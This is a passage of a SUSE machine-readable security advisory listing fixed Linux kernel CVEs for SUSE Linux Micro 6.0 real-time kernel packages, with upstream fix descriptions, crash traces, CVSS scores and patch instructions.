"category": "external",
"summary": "CVE-2023-54089",
"url": "https://www.suse.com/security/cve/CVE-2023-54089"
},
{
"category": "external",
"summary": "SUSE Bug 1256268 for CVE-2023-54089",
"url": "https://bugzilla.suse.com/1256268"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54089"
},
{
"cve": "CVE-2023-54091",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54091"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/client: Fix memory leak in drm_client_target_cloned\n\ndmt_mode is allocated and never freed in this function.\nIt was found with the ast driver, but most drivers using generic fbdev\nsetup are probably affected.\n\nThis fixes the following kmemleak report:\n backtrace:\n [\u003c00000000b391296d\u003e] drm_mode_duplicate+0x45/0x220 [drm]\n [\u003c00000000e45bb5b3\u003e] drm_client_target_cloned.constprop.0+0x27b/0x480 [drm]\n [\u003c00000000ed2d3a37\u003e] drm_client_modeset_probe+0x6bd/0xf50 [drm]\n [\u003c0000000010e5cc9d\u003e] __drm_fb_helper_initial_config_and_unlock+0xb4/0x2c0 [drm_kms_helper]\n [\u003c00000000909f82ca\u003e] drm_fbdev_client_hotplug+0x2bc/0x4d0 [drm_kms_helper]\n [\u003c00000000063a69aa\u003e] drm_client_register+0x169/0x240 [drm]\n [\u003c00000000a8c61525\u003e] ast_pci_probe+0x142/0x190 [ast]\n [\u003c00000000987f19bb\u003e] local_pci_probe+0xdc/0x180\n [\u003c000000004fca231b\u003e] work_for_cpu_fn+0x4e/0xa0\n [\u003c0000000000b85301\u003e] process_one_work+0x8b7/0x1540\n [\u003c000000003375b17c\u003e] worker_thread+0x70a/0xed0\n [\u003c00000000b0d43cd9\u003e] kthread+0x29f/0x340\n [\u003c000000008d770833\u003e] ret_from_fork+0x1f/0x30\nunreferenced object 0xff11000333089a00 (size 128):",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54091",
"url": "https://www.suse.com/security/cve/CVE-2023-54091"
},
{
"category": "external",
"summary": "SUSE Bug 1256274 for CVE-2023-54091",
"url": "https://bugzilla.suse.com/1256274"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2023-54091"
},
{
"cve": "CVE-2023-54092",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54092"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: s390: pv: fix index value of replaced ASCE\n\nThe index field of the struct page corresponding to a guest ASCE should\nbe 0. When replacing the ASCE in s390_replace_asce(), the index of the\nnew ASCE should also be set to 0.\n\nHaving the wrong index might lead to the wrong addresses being passed\naround when notifying pte invalidations, and eventually to validity\nintercepts (VM crash) if the prefix gets unmapped and the notifier gets\ncalled with the wrong address.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54092",
"url": "https://www.suse.com/security/cve/CVE-2023-54092"
},
{
"category": "external",
"summary": "SUSE Bug 1256370 for CVE-2023-54092",
"url": "https://bugzilla.suse.com/1256370"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54092"
},
{
"cve": "CVE-2023-54093",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54093"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: anysee: fix null-ptr-deref in anysee_master_xfer\n\nIn anysee_master_xfer, msg is controlled by user. When msg[i].buf\nis null and msg[i].len is zero, former checks on msg[i].buf would be\npassed. Malicious data finally reach anysee_master_xfer. If accessing\nmsg[i].buf[0] without sanity check, null ptr deref would happen.\nWe add check on msg[i].len to prevent crash.\n\nSimilar commit:\ncommit 0ed554fd769a\n(\"media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()\")\n\n[hverkuil: add spaces around +]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54093",
"url": "https://www.suse.com/security/cve/CVE-2023-54093"
},
{
"category": "external",
"summary": "SUSE Bug 1256273 for CVE-2023-54093",
"url": "https://bugzilla.suse.com/1256273"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54093"
},
{
"cve": "CVE-2023-54094",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54094"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: prevent skb corruption on frag list segmentation\n\nIan reported several skb corruptions triggered by rx-gro-list,\ncollecting different oops alike:\n\n[ 62.624003] BUG: kernel NULL pointer dereference, address: 00000000000000c0\n[ 62.631083] #PF: supervisor read access in kernel mode\n[ 62.636312] #PF: error_code(0x0000) - not-present page\n[ 62.641541] PGD 0 P4D 0\n[ 62.644174] Oops: 0000 [#1] PREEMPT SMP NOPTI\n[ 62.648629] CPU: 1 PID: 913 Comm: napi/eno2-79 Not tainted 6.4.0 #364\n[ 62.655162] Hardware name: Supermicro Super Server/A2SDi-12C-HLN4F, BIOS 1.7a 10/13/2022\n[ 62.663344] RIP: 0010:__udp_gso_segment (./include/linux/skbuff.h:2858\n./include/linux/udp.h:23 net/ipv4/udp_offload.c:228 net/ipv4/udp_offload.c:261\nnet/ipv4/udp_offload.c:277)\n[ 62.687193] RSP: 0018:ffffbd3a83b4f868 EFLAGS: 00010246\n[ 62.692515] RAX: 00000000000000ce RBX: 0000000000000000 RCX: 0000000000000000\n[ 62.699743] RDX: ffffa124def8a000 RSI: 0000000000000079 RDI: ffffa125952a14d4\n[ 62.706970] RBP: ffffa124def8a000 R08: 0000000000000022 R09: 00002000001558c9\n[ 62.714199] R10: 0000000000000000 R11: 00000000be554639 R12: 00000000000000e2\n[ 62.721426] R13: ffffa125952a1400 R14: ffffa125952a1400 R15: 00002000001558c9\n[ 62.728654] FS: 0000000000000000(0000) GS:ffffa127efa40000(0000)\nknlGS:0000000000000000\n[ 62.736852] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 62.742702] CR2: 00000000000000c0 CR3: 00000001034b0000 CR4: 00000000003526e0\n[ 62.749948] Call Trace:\n[ 62.752498] \u003cTASK\u003e\n[ 62.779267] inet_gso_segment (net/ipv4/af_inet.c:1398)\n[ 62.787605] skb_mac_gso_segment (net/core/gro.c:141)\n[ 62.791906] __skb_gso_segment (net/core/dev.c:3403 (discriminator 2))\n[ 62.800492] validate_xmit_skb (./include/linux/netdevice.h:4862\nnet/core/dev.c:3659)\n[ 62.804695] validate_xmit_skb_list (net/core/dev.c:3710)\n[ 62.809158] sch_direct_xmit (net/sched/sch_generic.c:330)\n[ 62.813198] __dev_queue_xmit (net/core/dev.c:3805 net/core/dev.c:4210)\nnet/netfilter/core.c:626)\n[ 62.821093] br_dev_queue_push_xmit (net/bridge/br_forward.c:55)\n[ 62.825652] maybe_deliver (net/bridge/br_forward.c:193)\n[ 62.829420] br_flood (net/bridge/br_forward.c:233)\n[ 62.832758] br_handle_frame_finish (net/bridge/br_input.c:215)\n[ 62.837403] br_handle_frame (net/bridge/br_input.c:298\nnet/bridge/br_input.c:416)\n[ 62.851417] __netif_receive_skb_core.constprop.0 (net/core/dev.c:5387)\n[ 62.866114] __netif_receive_skb_list_core (net/core/dev.c:5570)\n[ 62.871367] netif_receive_skb_list_internal (net/core/dev.c:5638\nnet/core/dev.c:5727)\n[ 62.876795] napi_complete_done (./include/linux/list.h:37\n./include/net/gro.h:434 ./include/net/gro.h:429 net/core/dev.c:6067)\n[ 62.881004] ixgbe_poll (drivers/net/ethernet/intel/ixgbe/ixgbe_main.c:3191)\n[ 62.893534] __napi_poll (net/core/dev.c:6498)\n[ 62.897133] napi_threaded_poll (./include/linux/netpoll.h:89\nnet/core/dev.c:6640)\n[ 62.905276] kthread (kernel/kthread.c:379)\n[ 62.913435] ret_from_fork (arch/x86/entry/entry_64.S:314)\n[ 62.917119] \u003c/TASK\u003e\n\nIn the critical scenario, rx-gro-list GRO-ed packets are fed, via a\nbridge, both to the local input path and to an egress device (tun).\n\nThe segmentation of such packets unsafely writes to the cloned skbs\nwith shared heads.\n\nThis change addresses the issue by uncloning as needed the\nto-be-segmented skbs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54094",
"url": "https://www.suse.com/security/cve/CVE-2023-54094"
},
{
"category": "external",
"summary": "SUSE Bug 1256292 for CVE-2023-54094",
"url": "https://bugzilla.suse.com/1256292"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54094"
},
{
"cve": "CVE-2023-54095",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54095"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/iommu: Fix notifiers being shared by PCI and VIO buses\n\nfail_iommu_setup() registers the fail_iommu_bus_notifier struct to both\nPCI and VIO buses. struct notifier_block is a linked list node, so this\ncauses any notifiers later registered to either bus type to also be\nregistered to the other since they share the same node.\n\nThis causes issues in (at least) the vgaarb code, which registers a\nnotifier for PCI buses. pci_notify() ends up being called on a vio\ndevice, converted with to_pci_dev() even though it\u0027s not a PCI device,\nand finally makes a bad access in vga_arbiter_add_pci_device() as\ndiscovered with KASAN:\n\n BUG: KASAN: slab-out-of-bounds in vga_arbiter_add_pci_device+0x60/0xe00\n Read of size 4 at addr c000000264c26fdc by task swapper/0/1\n\n Call Trace:\n dump_stack_lvl+0x1bc/0x2b8 (unreliable)\n print_report+0x3f4/0xc60\n kasan_report+0x244/0x698\n __asan_load4+0xe8/0x250\n vga_arbiter_add_pci_device+0x60/0xe00\n pci_notify+0x88/0x444\n notifier_call_chain+0x104/0x320\n blocking_notifier_call_chain+0xa0/0x140\n device_add+0xac8/0x1d30\n device_register+0x58/0x80\n vio_register_device_node+0x9ac/0xce0\n vio_bus_scan_register_devices+0xc4/0x13c\n __machine_initcall_pseries_vio_device_init+0x94/0xf0\n do_one_initcall+0x12c/0xaa8\n kernel_init_freeable+0xa48/0xba8\n kernel_init+0x64/0x400\n ret_from_kernel_thread+0x5c/0x64\n\nFix this by creating separate notifier_block structs for each bus type.\n\n[mpe: Add #ifdef to fix CONFIG_IBMVIO=n build]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54095",
"url": "https://www.suse.com/security/cve/CVE-2023-54095"
},
{
"category": "external",
"summary": "SUSE Bug 1256271 for CVE-2023-54095",
"url": "https://bugzilla.suse.com/1256271"
},
{
"category": "external",
"summary": "SUSE Bug 1256272 for CVE-2023-54095",
"url": "https://bugzilla.suse.com/1256272"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54095"
},
{
"cve": "CVE-2023-54096",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54096"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsoundwire: fix enumeration completion\n\nThe soundwire subsystem uses two completion structures that allow\ndrivers to wait for soundwire device to become enumerated on the bus and\ninitialised by their drivers, respectively.\n\nThe code implementing the signalling is currently broken as it does not\nsignal all current and future waiters and also uses the wrong\nreinitialisation function, which can potentially lead to memory\ncorruption if there are still waiters on the queue.\n\nNot signalling future waiters specifically breaks sound card probe\ndeferrals as codec drivers can not tell that the soundwire device is\nalready attached when being reprobed. Some codec runtime PM\nimplementations suffer from similar problems as waiting for enumeration\nduring resume can also timeout despite the device already having been\nenumerated.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54096",
"url": "https://www.suse.com/security/cve/CVE-2023-54096"
},
{
"category": "external",
"summary": "SUSE Bug 1256178 for CVE-2023-54096",
"url": "https://bugzilla.suse.com/1256178"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54096"
},
{
"cve": "CVE-2023-54099",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54099"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs: Protect reconfiguration of sb read-write from racing writes\n\nThe reconfigure / remount code takes a lot of effort to protect\nfilesystem\u0027s reconfiguration code from racing writes on remounting\nread-only. However during remounting read-only filesystem to read-write\nmode userspace writes can start immediately once we clear SB_RDONLY\nflag. This is inconvenient for example for ext4 because we need to do\nsome writes to the filesystem (such as preparation of quota files)\nbefore we can take userspace writes so we are clearing SB_RDONLY flag\nbefore we are fully ready to accept userpace writes and syzbot has found\na way to exploit this [1]. Also as far as I\u0027m reading the code\nthe filesystem remount code was protected from racing writes in the\nlegacy mount path by the mount\u0027s MNT_READONLY flag so this is relatively\nnew problem. It is actually fairly easy to protect remount read-write\nfrom racing writes using sb-\u003es_readonly_remount flag so let\u0027s just do\nthat instead of having to workaround these races in the filesystem code.\n\n[1] https://lore.kernel.org/all/00000000000006a0df05f6667499@google.com/T/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54099",
"url": "https://www.suse.com/security/cve/CVE-2023-54099"
},
{
"category": "external",
"summary": "SUSE Bug 1256197 for CVE-2023-54099",
"url": "https://bugzilla.suse.com/1256197"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54099"
},
{
"cve": "CVE-2023-54101",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54101"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndriver: soc: xilinx: use _safe loop iterator to avoid a use after free\n\nThe hash_for_each_possible() loop dereferences \"eve_data\" to get the\nnext item on the list. However the loop frees eve_data so it leads to\na use after free. Use hash_for_each_possible_safe() instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54101",
"url": "https://www.suse.com/security/cve/CVE-2023-54101"
},
{
"category": "external",
"summary": "SUSE Bug 1256153 for CVE-2023-54101",
"url": "https://bugzilla.suse.com/1256153"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54101"
},
{
"cve": "CVE-2023-54104",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54104"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmtd: rawnand: fsl_upm: Fix an off-by one test in fun_exec_op()\n\n\u0027op-cs\u0027 is copied in \u0027fun-\u003emchip_number\u0027 which is used to access the\n\u0027mchip_offsets\u0027 and the \u0027rnb_gpio\u0027 arrays.\nThese arrays have NAND_MAX_CHIPS elements, so the index must be below this\nlimit.\n\nFix the sanity check in order to avoid the NAND_MAX_CHIPS value. This\nwould lead to out-of-bound accesses.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54104",
"url": "https://www.suse.com/security/cve/CVE-2023-54104"
},
{
"category": "external",
"summary": "SUSE Bug 1256145 for CVE-2023-54104",
"url": "https://bugzilla.suse.com/1256145"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54104"
},
{
"cve": "CVE-2023-54106",
"ids": [
{
"system_name": "SUSE CVE Page",
